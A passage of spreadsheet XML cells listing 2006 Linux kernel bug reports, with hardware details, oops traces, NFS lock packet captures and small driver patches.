    <t>Distribution: gentoo Hardware Environment: Samsung X20 1860SE / Intel Centrino 1,86GHz Problem Description: In drivers/usb/misc/auerswald.c I have to add every time I compile a new kernel 2 extra lines. Only then my Auerswald-TK-device is recognised when I connect it via USB (I have a COMpact 2204 USB). I found this workaround at this webpage (in german): http://www.lug-kr.de/cgi-bin/lugwiki.pl?TelefonanlageVonAuerswald Almost at the end of drivers/usb/misc/auerswald.c it has to look like this: static struct usb_device_id auerswald_ids [] = { { USB_DEVICE (ID_AUERSWALD, 0x00C0) }, /* COMpact 2104 USB */ { USB_DEVICE (ID_AUERSWALD, 0x00DB) }, /* COMpact 4410/2206 USB */ /* now the 2 extra lines */ { USB_DEVICE (ID_AUERSWALD, 0x00DC) }, /* COMpact 4406 DSL */ { USB_DEVICE (ID_AUERSWALD, 0x00DD) }, /* COMpact 2204 USB */ /* end of the 2 extra lines */ { USB_DEVICE (ID_AUERSWALD, 0x00F1) }, /* Comfort 2000 System Telephone */ { USB_DEVICE (ID_AUERSWALD, 0x00F2) }, /* Comfort 1200 System Telephone */ { } /* Terminating entry */ }; That would be an easy fix.</t>
  </si>
  <si>
    <t>recent davej kernels (2.6.15-git*-base) eat my filesystem</t>
  </si>
  <si>
    <t>2.6.15-git*</t>
  </si>
  <si>
    <t>2006-01-18 02:21 UTC</t>
  </si>
  <si>
    <t>2006-02-13 12:23 UTC</t>
  </si>
  <si>
    <t>Most recent kernel where this bug did not occur: 2.6.15 Distribution: Fedora Core Devel (Rawhide) Hardware Environment: AMD64 + SATA, nforce4 chipset + sil chipset, 2 GiB mem Software Environment: raid 1 + lvm Problem Description: Booting in any recent davej kernel results in lots of system errors (md, sata) and quick filesystem corruption Some examples : ata5: translated ATA stat/err 0x51/04 to SCSI SK/ASC/ASCQ 0xb/00/00 ata5: status=0x51 { DriveReady SeekComplete Error } ata5: error=0x04 { DriveStatusError } sd 4:0:0:0: SCSI error: return code = 0x8000002 sda: Current: sense key: Medium Error Additional sense: Unrecovered read error - auto reallocate failed end_request: I/O error, dev sda, sector 4192831 (no idea if the problem is in the SATA layer or somewhere deeper) More material (logs, lspci...) available in: https://bugzilla.redhat.com/bugzilla/show_bug.cgi?id=177951</t>
  </si>
  <si>
    <t>e100 still pulls IRQ after RESET: irq 11: nobody cared</t>
  </si>
  <si>
    <t>2006-01-18 06:10 UTC</t>
  </si>
  <si>
    <t>Nils Rennebarth</t>
  </si>
  <si>
    <t>2006-08-27 19:34 UTC</t>
  </si>
  <si>
    <t>Most recent kernel where this bug did not occur: Distribution: self compiled vanilla kernel Hardware Environment: Supermicro mainboard, 2 onboard e100 network adapters Software Environment: Problem Description: Sometimes during boot, I get a irq 11: nobody cared together with a backtrace. The irq is then disabled which renders the network card non-functional. Apparently this depends on the exact order the hardware is detected. I never got the problem with a 2.6.14.3 kernel but that may be pure luck. Steps to reproduce: This is difficult to reproduce. Only entering the BIOS and setting "Reset Config Data" to yes which is supposed to clear PCI/PnP Configuration data stored in Flash on next boot makes the problem go away reliably.</t>
  </si>
  <si>
    <t>sata_uli fails to see harddisks on PCI ID 10b9:5289 (subsys 1849:5289)</t>
  </si>
  <si>
    <t>2.6.15, 2.6.15-mm4, 2.6.16-rc2-mm1</t>
  </si>
  <si>
    <t>2006-01-19 05:50 UTC</t>
  </si>
  <si>
    <t>Bernhard Rosenkraenzer</t>
  </si>
  <si>
    <t>2007-06-18 08:34 UTC</t>
  </si>
  <si>
    <t>Most recent kernel where this bug did not occur: never worked Distribution: Ark Linux Hardware Environment: ASRock 939Dual-SATA2 mainboard (BIOS 1.50), Maxtor 6Y060M0 60GB SATA Harddisk connected to SATA1 port Software Environment: Ark Linux dockyard-devel Problem Description: The sata_uli module loads fine and detects the controller, but fails to see any attached harddisks. The harddisk is seen and identified correctly in the BIOS setup. Related messages on bootup: libata version 1.20 loaded. sata_uli 0000:00:12.1: version 0.5 ACPI: PCI Interrupt 0000:00:12.1[A] -&gt; GSI 19 (level, low) -&gt; IRQ 209 ata1: SATA max UDMA/133 cmd 0xEC00 ctl 0xE082 bmdma 0xD880 irq 209 ata2: SATA max UDMA/133 cmd 0xE000 ctl 0xDC02 bmdma 0xD888 irq 209 ata1: SATA link down (SStatus 0) scsi0: sata_uli ata2: SATA link up 1.5 Gbps (SStatus 113) scsi1 : sata_uli This happens both with an x86 and an x86_64 kernel. Steps to reproduce: Boot Linux on an ASRock 939Dual-SATA2 mainboard w/ an attached Maxtor 6Y060M0 60GB SATA harddisk, try to use the SATA port.</t>
  </si>
  <si>
    <t>i2o_scsi oops on abort</t>
  </si>
  <si>
    <t>2006-01-19 06:40 UTC</t>
  </si>
  <si>
    <t>Kenny Simpson</t>
  </si>
  <si>
    <t>2006-02-05 11:42 UTC</t>
  </si>
  <si>
    <t>Distribution: Debian Sarge Hardware Environment: Onboard Adaptec RAID with zero-channel controller conntected to 4 Seagate drived in RAID 10 Software Environment: 2.6.15 kernel. Problem Description: When a scsi command failed, an oops would result. Steps to reproduce: Back-to-back SMART queries would make the Seagate drives unhappy. The second SMART query would timeout, and the command would be aborted. Here is a patch which fixed the problem, but I see it not applied as of2.6.15.1: Index: drivers/message/i2o/i2o_scsi.c =================================================================== --- drivers/message/i2o/i2o_scsi.c (revision 324) +++ drivers/message/i2o/i2o_scsi.c (working copy) @@ -732,7 +732,7 @@ cpu_to_le32(I2O_CMD_SCSI_ABORT &lt;&lt; 24 | HOST_TID &lt;&lt; 12 | tid); msg-&gt;body[0] = cpu_to_le32(i2o_cntxt_list_get_ptr(c, SCpnt)); - if (i2o_msg_post_wait(c, msg, I2O_TIMEOUT_SCSI_SCB_ABORT)) + if (!i2o_msg_post_wait(c, msg, I2O_TIMEOUT_SCSI_SCB_ABORT)) status = SUCCESS; return status;</t>
  </si>
  <si>
    <t>compilation of kernel without modules doenst work - make install bug</t>
  </si>
  <si>
    <t>last kernel 2.6.15.x</t>
  </si>
  <si>
    <t>2006-01-19 15:37 UTC</t>
  </si>
  <si>
    <t>joel pichette</t>
  </si>
  <si>
    <t>2006-01-20 15:17 UTC</t>
  </si>
  <si>
    <t>Most recent kernel where this bug did not occur: Distribution: fedora core 4 Hardware Environment: dual p3 1ghz, 256mb rdram, software raid0 2hard drive scsi 10k rpm , /boot = 100mb, hp kayak xu800, matrox g400 dualhead Software Environment: graphical fedora core 4 Problem Description: compilation of monolithic kernel doesn't allow me to do MAKE INSTALL of the kernel Steps to reproduce: compile without modules support then type 'make install' (make modules_install is useless, no modules) Log of problem : Root device is (9, 0) Boot sector 512 bytes. Setup is 4618 bytes. System is 2450 kB Kernel: arch/i386/boot/bzImage is ready (#1) [root@localhost linux-2.6.15]# make install CHK include/linux/version.h CHK include/linux/compile.h CHK usr/initramfs_list Kernel: arch/i386/boot/bzImage is ready (#1) sh /usr/src/kernels/linux-2.6.15/arch/i386/boot/install.sh 2.6.15-joel-joe arch/i386/boot/bzImage System.map "/boot" WARNING: Couldn't open directory /lib/modules/2.6.15: No such file or directory FATAL: Could not open /lib/modules/2.6.15/modules.dep.temp for writing: No such file or directory /lib/modules/2.6.15 is not a directory. mkinitrd failed make[1]: *** [install] Error 1 make: *** [install] Error 2 # ------------------------------------------- log of .config file # # Loadable module support # # CONFIG_MODULES is not set</t>
  </si>
  <si>
    <t>2.6.15 regression - 2nd CPU unused - Serverworks OSB4/Supermicro 370DER</t>
  </si>
  <si>
    <t>2006-01-20 18:38 UTC</t>
  </si>
  <si>
    <t>Ronald Hummelink</t>
  </si>
  <si>
    <t>2006-02-10 19:02 UTC</t>
  </si>
  <si>
    <t>Most recent kernel where this bug did not occur: Vanilla release 2.6.14 is good, 2.6.15 is affected. git bisected it down to (with the help of dsd@gentoo irc): # git bisect bad cd8e2b48daee891011a4f21e2c62b210d24dcc9e is first bad commit diff-tree cd8e2b48daee891011a4f21e2c62b210d24dcc9e (from d2149b542382bfc206cb28485108f6470c979566) Author: Venkatesh Pallipadi &lt;venkatesh.pallipadi@intel.com&gt; Date: Fri Oct 21 19:22:00 2005 -0400 [ACPI] fix 2.6.13 boot hang regression on HT box w/ broken BIOS http://bugzilla.kernel.org/show_bug.cgi?id=5452 Signed-off-by: Venkatesh Pallipadi &lt;venkatesh.pallipadi@intel.com&gt; Signed-off-by: Len Brown &lt;len.brown@intel.com&gt; :040000 040000 9cb687b77dcd64bf82e9a73214db467c964c1266 b1bde4a4ad91720daa6645c60bdc123b824c39b2 M drivers Distribution: Gentoo Hardware Environment: Supermicro 370DER mainboard, dual p3 1ghz coppermine, 512mb ecc reg pc 133, scsi drive Software Environment: Gentoo Problem Description: CPU0 and CPU1 are both detected by the kernel, and show in a program like top. but on any kernel after given commit CPU1 won</t>
  </si>
  <si>
    <t>Openswan tunnels + netfilter problem</t>
  </si>
  <si>
    <t>2006-01-22 12:02 UTC</t>
  </si>
  <si>
    <t>Domenico</t>
  </si>
  <si>
    <t>2006-04-22 13:06 UTC</t>
  </si>
  <si>
    <t>Most recent kernel where this bug did not occur: Distribution: Fedora Core 4 Hardware Environment: Athlon 64, SATA HDD but occurs also with only ATA Drives Software Environment: Problem Description:using a tunnel (ping through it), trying to using another the kernel Ooops Jan 22 20:23:17 router kernel: Unable to handle kernel NULL pointer dereference at 000000000000009c RIP: Jan 22 20:23:17 router kernel: &lt;ffffffff80345195&gt;{xfrm4_output_finish+293} Jan 22 20:23:17 router kernel: PGD 35377067 PUD 0 Jan 22 20:23:17 router kernel: Oops: 0000 [6] Jan 22 20:23:17 router kernel: CPU 0 Jan 22 20:23:17 router kernel: Modules linked in: af_key deflate zlib_deflate twofish serpent blowfish sha256 crypto_null ae$ Jan 22 20:23:17 router kernel: Pid: 9481, comm: ping Not tainted 2.6.16-rc1 #2 Jan 22 20:23:17 router kernel: RIP: 0010:[&lt;ffffffff80345195&gt;] &lt;ffffffff80345195&gt;{xfrm4_output_finish+293} Jan 22 20:23:17 router kernel: RSP: 0018:ffff810030c19a78 EFLAGS: 00010297 Jan 22 20:23:17 router kernel: RAX: 0000000000000000 RBX: ffff810032242c3c RCX: 0000000000000001 Jan 22 20:23:17 router kernel: RDX: 0000000000000001 RSI: 0000000000000449 RDI: ffff81003cba4d80 Jan 22 20:23:17 router kernel: RBP: ffff81003cba4d80 R08: 0000000000001d4b R09: ffffffff804ac460 Jan 22 20:23:17 router kernel: R10: 000000000000001a R11: ffff810032242878 R12: 0000000000000000 Jan 22 20:23:17 router kernel: R13: 0000000000000040 R14: 0000000000000040 R15: ffff810038dff9c0 Jan 22 20:23:17 router kernel: FS: 00002aeb6a96fd00(0000) GS:ffffffff804ba000(0000) knlGS:0000000000000000 Jan 22 20:23:17 router kernel: CS: 0010 DS: 0000 ES: 0000 CR0: 000000008005003b Jan 22 20:23:17 router kernel: CR2: 000000000000009c CR3: 0000000038565000 CR4: 00000000000006e0 Jan 22 20:23:17 router kernel: Process ping (pid: 9481, threadinfo ffff810030c18000, task ffff81003ba90180) Jan 22 20:23:17 router kernel: Stack: ffffffff80345070 0000000080000000 00000002804ac450 ffffffff80307864 Jan 22 20:23:17 router kernel: ffff81003cba4d80 ffff810032242c3c ffff81003ed74a40 ffff81003868f0c0 Jan 22 20:23:17 router kernel: 0000000000000040 0000000000000040 Jan 22 20:23:17 router kernel: Call Trace: &lt;ffffffff80345070&gt;{xfrm4_output_finish+0} Jan 22 20:23:17 router kernel: &lt;ffffffff80307864&gt;{nf_hook_slow+100} &lt;ffffffff803454b4&gt;{xfrm4_output+84} Jan 22 20:23:17 router kernel: &lt;ffffffff8031289f&gt;{ip_push_pending_frames+895} &lt;ffffffff8032cf95&gt;{raw_sendmsg+1685} Jan 22 20:23:17 router kernel: &lt;ffffffff803484e9&gt;{xfrm_state_get_afinfo+73} &lt;ffffffff8034a16c&gt;{xfrm_state_find+2588} Jan 22 20:23:17 router kernel: &lt;ffffffff802e28fa&gt;{sock_sendmsg+266} &lt;ffffffff80127e3d&gt;{try_to_wake_up+301} Jan 22 20:23:17 router kernel: &lt;ffffffff80140a10&gt;{autoremove_wake_function+0} &lt;ffffffff80357f99&gt;{_read_unlock_irq+9} Jan 22 20:23:17 router kernel: &lt;ffffffff80151f46&gt;{filemap_nopage+390} &lt;ffffffff802e1935&gt;{move_addr_to_kernel+37} Jan 22 20:23:17 router kernel: &lt;ffffffff802e2f9a&gt;{sys_sendmsg+586} &lt;ffffffff80357ea9&gt;{_spin_lock_irqsave+9} Jan 22 20:23:17 router kernel: &lt;ffffffff80140bb9&gt;{remove_wait_queue+25} &lt;ffffffff80357ea9&gt;{_spin_lock_irqsave+9} Jan 22 20:23:17 router kernel: &lt;ffffffff80203a81&gt;{__up_read+33} &lt;ffffffff80359583&gt;{do_page_fault+1139} Jan 22 20:23:17 router kernel: &lt;ffffffff802e4f29&gt;{release_sock+25} &lt;ffffffff80357f59&gt;{_spin_unlock_irq+9} Jan 22 20:23:17 router kernel: &lt;ffffffff8010ab12&gt;{system_call+126} Jan 22 20:23:17 router kernel: Jan 22 20:23:17 router kernel: Code: 41 80 bc 24 9c 00 00 00 00 74 57 48 8d 4d 58 48 8b 75 38 0f Jan 22 20:23:17 router kernel: RIP &lt;ffffffff80345195&gt;{xfrm4_output_finish+293} RSP &lt;ffff810030c19a78&gt; Jan 22 20:23:17 router kernel: CR2: 000000000000009c Jan 22 20:24:42 router rmmod: ERROR: Module xfrm4_tunnel is in use Steps to reproduce: With openswan running use two tunnels togheter, the problem occours on both gateway but separately</t>
  </si>
  <si>
    <t>dvb-other</t>
  </si>
  <si>
    <t>Andreas Oberritter</t>
  </si>
  <si>
    <t>r8169 Losing some ticks</t>
  </si>
  <si>
    <t>2.6.15.1, 2.6.16-rc1, 2.6.16-rc1-mm2</t>
  </si>
  <si>
    <t>2006-01-24 01:16 UTC</t>
  </si>
  <si>
    <t>2006-02-07 13:53 UTC</t>
  </si>
  <si>
    <t>Most recent kernel where this bug did not occur: 2.6.16-rc1-mm2 Distribution: Gentoo Linux 2005.1 Hardware Environment: ADM64 + Yukon Gigabit Ethernet + RTL8169 Gigabit Ethernet Software Environment: Linux (console or X) Problem Description: My RTL8169 network interface seems to display 'Losing some ticks...checking if CPU frequency changed' in dmesg when the link is down. When the link is up, no losing ticks messages is saved in dmesg. To be more precise, my Yukon network interface is for Internet and my RTL8169 is for fast LAN. Steps to reproduce: compile kernels with skge and r8169 drivers in kernel and without linux kernel modules system activated. In my network setup, ips broadcast and networks are different. My network configuration has been tested on Windows XP without any problems.</t>
  </si>
  <si>
    <t>Oops when accessing SATA with device mapper on AMD 64 X2</t>
  </si>
  <si>
    <t>2.6.15.1smp</t>
  </si>
  <si>
    <t>2006-01-24 06:46 UTC</t>
  </si>
  <si>
    <t>Brian Daniels</t>
  </si>
  <si>
    <t>2007-11-13 04:35 UTC</t>
  </si>
  <si>
    <t>Most recent kernel where this bug did not occur: unknown Distribution: Fedora Core 3 Hardware Environment: MSI K8N Neo2 Platinum, AMD 64 X2 4200+, nForce3 chipset Software Environment: Occurs with 2.6.12-1.1381_FC3smp, 2.6.15, 2.6.15.1 Problem Description: My system has its two primary drives running from the SATA 1&amp;2 connections on the MB in a RAID 1 array. I have another HD attached to IDE2 on the MB that I use to run backups to. This configuration has been running fine for over a year. I recently upgraded the CPU to an AMD64 X2 4200+ and switched to a SMP kernel (2.6.12-1.1381_FC3smp). My backup script uses tar to copy files from the main filesystem to hdc, which is mounted as a cryptographic filesystem. I takes about 3-4 hours to complete. Since the upgrade, the backup will fail at some point during the process with the Oops below. The time to failure seems random, sometimes in the first 15 min, sometimes 2 hours, etc. This intially occurred with the stock 2.6.12-1.1381_FC3smp kernel. I have since tried compiling 2.6.15 and 2.6.15.1, which both fail in the same way. Running with a non-smp kernel, I have no problems. The Oops is sometimes on CPU 0, sometimes on CPU 1. The system is completely stable running on the SATA drives alone, even under high load. After the Oops the system is still functional, but you cannot unmount hdc, and shutdown will not work. Jan 23 23:26:51 hotblue kernel: Unable to handle kernel NULL pointer dereference at 0000000000000007 RIP: Jan 23 23:26:51 hotblue kernel: &lt;ffffffff80220175&gt;{blk_recount_segments+133} Jan 23 23:26:51 hotblue kernel: PGD 1e0bf067 PUD 1e0c3067 PMD 0 Jan 23 23:26:51 hotblue kernel: Oops: 0000 [1] SMP Jan 23 23:26:51 hotblue kernel: CPU 1 Jan 23 23:26:51 hotblue kernel: Modules linked in: sha256 aes_x86_64 dm_crypt nvidia parport_pc lp parport w83627hf hwmon_vid eeprom i2c_isa ipt_REJECT ipt_state ip_conntrack iptable_filter ip_tables nls_utf8 ntfs vfat fat video button battery ac powermate ohci1394 ieee1394 ohci_hcd ehci_hcd i2c_nforce2 i2c_core snd_intel8x0 snd_ac97_codec snd_ac97_bus snd_pcm_oss snd_mixer_oss snd_pcm snd_timer snd soundcore snd_page_alloc r8169 forcedeth floppy dm_mod sata_nv libata sd_mod scsi_mod Jan 23 23:26:51 hotblue kernel: Pid: 4704, comm: tar Tainted: P 2.6.15.1smp #1 Jan 23 23:26:51 hotblue kernel: RIP: 0010:[&lt;ffffffff80220175&gt;] &lt;ffffffff80220175&gt;{blk_recount_segments+133} Jan 23 23:26:51 hotblue kernel: RSP: 0018:ffff81001e0d54c8 EFLAGS: 00010202 Jan 23 23:26:51 hotblue kernel: RAX: 0000000000000000 RBX: 8e38e38e38e38e39 RCX: 000000000000000d Jan 23 23:26:51 hotblue kernel: RDX: 0000000000000000 RSI: 0000000000000000 RDI: ffff81003f8146b8 Jan 23 23:26:51 hotblue kernel: RBP: 0000000000000000 R08: 0000000000000000 R09: 0000000000000000 Jan 23 23:26:51 hotblue kernel: R10: ffff81001263a000 R11: 0000000000000000 R12: ffff81002abcef40 Jan 23 23:26:51 hotblue kernel: R13: 0000000000020000 R14: 00000000000000d0 R15: 0000000000000000 Jan 23 23:26:51 hotblue kernel: FS: 00002aaaaaad5b00(0000) GS:ffffffff8053c880(0000) knlGS:0000000055921060 Jan 23 23:26:51 hotblue kernel: CS: 0010 DS: 0000 ES: 0000 CR0: 000000008005003b Jan 23 23:26:51 hotblue kernel: CR2: 0000000000000007 CR3: 000000001eeba000 CR4: 00000000000006e0 Jan 23 23:26:51 hotblue kernel: Process tar (pid: 4704, threadinfo ffff81001e0d4000, task ffff81003e932040) Jan 23 23:26:51 hotblue kernel: Stack: 000d000000000048 000000013ffb7fc0 0000000100010010 0000000000000000 Jan 23 23:26:51 hotblue kernel: ffff81003f8146b8 ffff81002abcef40 ffff8100225ba6c0 ffff81003f8146b8 Jan 23 23:26:51 hotblue kernel: 0000000000020000 00000000000000d0 Jan 23 23:26:52 hotblue kernel: Call Trace:&lt;ffffffff80189c86&gt;{bio_clone+166} &lt;ffffffff886cc06e&gt;{:dm_crypt:crypt_map+238} Jan 23 23:26:52 hotblue kernel: &lt;ffffffff880472a1&gt;{:dm_mod:__map_bio+81} &lt;ffffffff88047629&gt;{:dm_mod:__split_bio+361} Jan 23 23:26:52 hotblue kernel: &lt;ffffffff80379541&gt;{__down_read+49} &lt;ffffffff88047935&gt;{:dm_mod:dm_request+261} Jan 23 23:26:52 hotblue kernel: &lt;ffffffff80222829&gt;{generic_make_request+361} &lt;ffffffff8018997e&gt;{bio_alloc_bioset+382} Jan 23 23:26:52 hotblue kernel: &lt;ffffffff80222918&gt;{submit_bio+216} &lt;ffffffff801abb52&gt;{mpage_bio_submit+34} Jan 23 23:26:52 hotblue kernel: &lt;ffffffff801ac49c&gt;{__mpage_writepage+860} &lt;ffffffff801eceb0&gt;{ext2_get_block+0} Jan 23 23:26:52 hotblue kernel: &lt;ffffffff80186465&gt;{__find_get_block_slow+277} &lt;ffffffff80379c09&gt;{_read_unlock_irq+9} Jan 23 23:26:52 hotblue kernel: &lt;ffffffff8015e9ae&gt;{find_get_pages_tag+158} &lt;ffffffff801ac8c3&gt;{mpage_writepages+579} Jan 23 23:26:52 hotblue kernel: &lt;ffffffff801ed4d0&gt;{ext2_writepage+0} &lt;ffffffff801eceb0&gt;{ext2_get_block+0} Jan 23 23:26:53 hotblue kernel: &lt;ffffffff801aaf5b&gt;{__writeback_single_inode+571} &lt;ffffffff801ecfb5&gt;{ext2_get_block+261} Jan 23 23:26:53 hotblue kernel: &lt;ffffffff801ab674&gt;{sync_sb_inodes+500} &lt;ffffffff801ab9d6&gt;{writeback_inodes+166} Jan 23 23:26:53 hotblue kernel: &lt;ffffffff80164ae4&gt;{balance_dirty_pages_ratelimited+228} Jan 23 23:26:53 hotblue kernel: &lt;ffffffff801602b5&gt;{generic_file_buffered_write+1285} Jan 23 23:26:53 hotblue kernel: &lt;ffffffff8013a1e5&gt;{current_fs_time+85} &lt;ffffffff801a049e&gt;{inode_update_time+62} Jan 23 23:26:53 hotblue kernel: &lt;ffffffff801609aa&gt;{__generic_file_aio_write_nolock+938} Jan 23 23:26:53 hotblue kernel: &lt;ffffffff8012d8ab&gt;{try_to_wake_up+1243} &lt;ffffffff80160a75&gt;{__generic_file_write_nolock+149} Jan 23 23:26:53 hotblue kernel: &lt;ffffffff8012f323&gt;{__wake_up+67} &lt;ffffffff80191c68&gt;{pipe_readv+840} Jan 23 23:26:53 hotblue kernel: &lt;ffffffff8014b9b0&gt;{autoremove_wake_function+0} &lt;ffffffff80160c0e&gt;{generic_file_write+126} Jan 23 23:26:53 hotblue kernel: &lt;ffffffff801847f9&gt;{vfs_write+233} &lt;ffffffff80184993&gt;{sys_write+83} Jan 23 23:26:53 hotblue kernel: &lt;ffffffff8010dc56&gt;{system_call+126} Jan 23 23:26:53 hotblue kernel: Jan 23 23:26:53 hotblue kernel: Code: 49 0f b6 41 07 4c 89 c9 48 8b 04 c5 40 5e 54 80 48 2b 88 20 Jan 23 23:26:53 hotblue kernel: RIP &lt;ffffffff80220175&gt;{blk_recount_segments+133} RSP &lt;ffff81001e0d54c8&gt; Jan 23 23:26:53 hotblue kernel: CR2: 0000000000000007 Steps to reproduce: Start a process that heavily accesses both the SATA drives and the IDE drive.</t>
  </si>
  <si>
    <t>sendfile() with 100 simultaneous 100MB files</t>
  </si>
  <si>
    <t>2006-01-24 08:28 UTC</t>
  </si>
  <si>
    <t>2008-09-22 13:04 UTC</t>
  </si>
  <si>
    <t>I was reading this blog post about the lighttpd web server. http://blog.lighttpd.net/articles/2005/11/11/optimizing-lighty-for-high-concurrent-large-file-downloads It describes problems they are having downloading 100 simultaneous 100MB files. In this post they complain about sendfile() getting into seek storms and ending up in 72% IO wait. As a result they built a user space mechanism to work around the problems. LKML thread about the issue: http://lkml.org/lkml/2006/1/20/331 Source to see how lighttpd uses sendfile() is here http://www.lighttpd.net/download/ My general conclusion is that since they were able to write a user space implementation that avoids the problem something must be broken in the kernel readahead logic for sendfile().</t>
  </si>
  <si>
    <t>easyRAID F8 IDE2SCSI adaptor problems with reporting too many luns</t>
  </si>
  <si>
    <t>2006-01-25 06:16 UTC</t>
  </si>
  <si>
    <t>Hans-Christian Armingeon</t>
  </si>
  <si>
    <t>2007-09-16 17:16 UTC</t>
  </si>
  <si>
    <t>Most recent kernel where this bug did not occur: 2.6.13.5 Distribution: gentoo amd64/2005.0 Hardware Environment: Tyan S2882 onboard Adaptec AIC7902 easyRAID F8 IDE2SCSI adaptor Software Environment: Problem Description: The EasyRAID F8 IDE2SCSI adaptor is reporting too many luns and is not accessible. Steps to reproduce: boot kernel 2.6.14 with an easyRaid F8. I think the problem is related to the domain validation in the U320 SCSI spec, and maybe a bios bug in the easyraid F8.</t>
  </si>
  <si>
    <t>Linux client sets block=false in NLM_CANCEL requests</t>
  </si>
  <si>
    <t>2.6.9-1.667smp</t>
  </si>
  <si>
    <t>2006-01-25 07:38 UTC</t>
  </si>
  <si>
    <t>2006-03-04 13:58 UTC</t>
  </si>
  <si>
    <t>Most recent kernel where this bug did not occur: Distribution: Fedora Core release 3 (Heidleberg) Hardware Environment: Software Environment: File system mounted with "mount -t nfs". No specific option. Problem Description: A process with a BLOCKED range lock request is killed. It sends a NLM_CANCEL request to the server to cancel the blocked range lock request. The issue is that it sets "block=false" in the NLM_CANCEL request. Thus, the cancel req doesn't match the pending lock req. which has block=true. The server replies the NLM_CANCEL with DENIED status. The NLM protocol says that block field in NLM_CANCEL must be set to true. Steps to reproduce: I use fcntl() to take the blocking range lock from 2 different processes. Then I use "kill -9 &lt;pid&gt;" to kill the process with the blocking lock request. Frame 1646 (266 bytes on wire, 266 bytes captured) Internet Protocol, Src: 10.64.220.148 , Dst: 192.168.8.92 Transmission Control Protocol, Src Port: 796 , Dst Port: 59915 Remote Procedure Call, XID:0xfbd662da // XID++ at each retry Network Lock Manager Protocol V4 Procedure: LOCK (2) cookie: &lt;DATA&gt; length: 4 contents: &lt;DATA&gt; // 0x35120000 block: Yes exclusive: Yes lock caller_name: newlnxjlr fh owner: &lt;DATA&gt; contents: &lt;DATA&gt; // "5065@newlnxjlr" svid: 5065 l_offset: 10 l_len: 20 reclaim: No Frame 1647 (106 bytes on wire, 106 bytes captured) Internet Protocol, Src: 192.168.8.92 , Dst: 10.64.220.148 Transmission Control Protocol, Src Port: 59915 , Dst Port: 796 Remote Procedure Reply XID:0xfbd662da Network Lock Manager Protocol V4 Procedure: LOCK (2) cookie: &lt;DATA&gt; length: 4 contents: &lt;DATA&gt; // 0x35120000 -&gt; 0x1235 stat: NLM_BLOCKED (3) Frame 1648 (258 bytes on wire, 258 bytes captured) Internet Protocol, Src: 10.64.220.148 , Dst: 192.168.8.92 Transmission Control Protocol, Src Port: 796 , Dst Port: 59915 Remote Procedure Call, XID:0xfcd662da Network Lock Manager Protocol V4 Procedure: CANCEL (3) cookie: &lt;DATA&gt; length: 4 contents: &lt;DATA&gt; // 0x36120000 -&gt; 0x1236 block: No &lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt; exclusive: Yes lock caller_name: newlnxjlr fh owner: &lt;DATA&gt; contents: &lt;DATA&gt; // "5065@newlnxjlr" svid: 5065 l_offset: 10 l_len: 20 Frame 1649 (106 bytes on wire, 106 bytes captured) Internet Protocol, Src: 192.168.8.92 , Dst: 10.64.220.148 Transmission Control Protocol, Src Port: 59915 , Dst Port: 796 Remote Procedure Reply XID:0xfcd662da Network Lock Manager Protocol V4 Procedure: CANCEL (3) cookie: &lt;DATA&gt; length: 4 contents: &lt;DATA&gt; // 0x36120000 -&gt; 0x1236 stat: NLM_DENIED (1)</t>
  </si>
  <si>
    <t>Linux client retries NLM_CANCEL forever upon DENIED status. Must reboot the client.</t>
  </si>
  <si>
    <t>2006-01-25 08:02 UTC</t>
  </si>
  <si>
    <t>2006-03-04 13:59 UTC</t>
  </si>
  <si>
    <t>Most recent kernel where this bug did not occur: Distribution: Fedora Core release 3 (Heidleberg) Hardware Environment: Software Environment: File system mounted with "mount -t nfs". No specific option. Problem Description: A process with a BLOCKED range lock request is killed. It sends a NLM_CANCEL request to the server to cancel the blocked range lock request. The server replies NLM_CANCEL with DENIED status to mean that there is no such lock request to kill (perhaps the GRANTED callback has just been sent). The issue is that the client will loop forever sending NLM_CANCEL requests (and the server will allways reply with DENIED status). At this point, the mouse on the client doesn't respond, the client doesn't respond to telnet either... I had to reboot it. It is reproductible. // kill -9 &lt;process that has the blocked request pending&gt; 1648 41:15.74465 newlnxjlr-&gt;bx19s2_r8 NLM C CANCEL4 OH=3612 FH=44E2 PID=5065 Region=10:20 1649 41:15.75599 bx19s2_r8-&gt;newlnxjlr NLM R CANCEL4 OH=3612 denied // block=false 1650 41:16.90804 bx19s2_r8-&gt;newlnxjlr NLM R CANCEL4 OH=3612 denied 1651 41:19.90809 bx19s2_r8-&gt;newlnxjlr NLM R CANCEL4 OH=3612 denied 1652 41:25.90816 bx19s2_r8-&gt;newlnxjlr NLM R CANCEL4 OH=3612 denied 1653 41:37.90836 bx19s2_r8-&gt;newlnxjlr NLM R CANCEL4 OH=3612 denied 1654 42:01.90861 bx19s2_r8-&gt;newlnxjlr NLM R CANCEL4 OH=3612 denied 1661 42:49.90924 bx19s2_r8-&gt;newlnxjlr NLM R CANCEL4 OH=3612 denied // At this point, the Linux client doesn't answer anymore. // No mouse. Cannot telnet from another box. Needs reboot. // No error found in /var/log/messages Steps to reproduce:</t>
  </si>
  <si>
    <t>bluetooth CF card is broken by suspend/resume</t>
  </si>
  <si>
    <t>2.6.9-2.6.16-rc1</t>
  </si>
  <si>
    <t>2006-01-25 11:52 UTC</t>
  </si>
  <si>
    <t>Distribution: Debian Hardware Environment: i386 Steps to reproduce: Suspend to RAM (and I think suspend-to-disk too, will verify) breaks bluetooth running over CF card. Problem probably is because CF card is initialized from userland (by hciattach?), and userland has no idea that we have just suspended. After resume, I have endless stream of errors in syslog. Jan 25 17:52:26 amd kernel: bcsp_pkt_cull: Peer acked invalid packet Jan 25 17:52:26 amd kernel: bcsp_handle_le_pkt: Found a LE sync pkt, card has reset Jan 25 17:52:26 amd kernel: bcsp_pkt_cull: Peer acked invalid packet Jan 25 17:52:26 amd kernel: bcsp_handle_le_pkt: Found a LE sync pkt, card has reset Jan 25 17:52:26 amd kernel: bcsp_pkt_cull: Peer acked invalid packet Jan 25 17:52:26 amd kernel: bcsp_handle_le_pkt: Found a LE sync pkt, card has reset Jan 25 17:52:26 amd kernel: bcsp_pkt_cull: Peer acked invalid packet Jan 25 17:52:26 amd kernel: bcsp_handle_le_pkt: Found a LE sync pkt, card has reset ...perhaps error handling in bluetooth-over-serial needs some improvements...</t>
  </si>
  <si>
    <t>CPU lock up during suspend to disk</t>
  </si>
  <si>
    <t>2.6.16-rc1-mm3</t>
  </si>
  <si>
